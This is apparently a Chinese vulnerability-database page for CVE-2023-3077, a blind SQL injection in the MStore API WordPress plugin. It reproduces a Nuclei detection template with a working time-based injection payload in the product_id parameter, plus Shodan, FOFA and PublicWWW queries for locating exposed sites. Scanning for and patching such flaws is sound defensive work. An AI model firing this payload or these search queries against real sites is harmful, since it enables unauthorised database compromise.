CVE-2023-3077: MStore API < 3.9.8 - SQL Injection

日期: 2025-08-01 | 影响软件: MStore API | POC: 已公开

漏洞描述

The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.

PoC代码[已公开]

id: CVE-2023-3077

info:
  name: MStore API < 3.9.8 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.
  impact: |
    Allows an attacker to extract sensitive data from the database
  remediation: |
    Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability
  reference:
    - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3077
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3077
    epss-score: 0.4013
    epss-percentile: 0.9725
    cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: inspireui
    product: mstore_api
    framework: wordpress
    publicwww-query: "/wp-content/plugins/mstore-api/"
    shodan-query: http.html:/wp-content/plugins/mstore-api/
    fofa-query: body=/wp-content/plugins/mstore-api/
  tags: time-based-sqli,cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "MStore API")'
        condition: and

  - raw:
      - |
        @timeout: 15s
        GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220600dfa8ad5fe249ace50284009b1a7c23e64d82298b34d3b36358ade2b500077022100cb93874ec7a6305efa2ab4797d15c3a880635588f9ebe118d0fbede04451f267:922c64590222798bb761d5b6d8e72950

相关漏洞推荐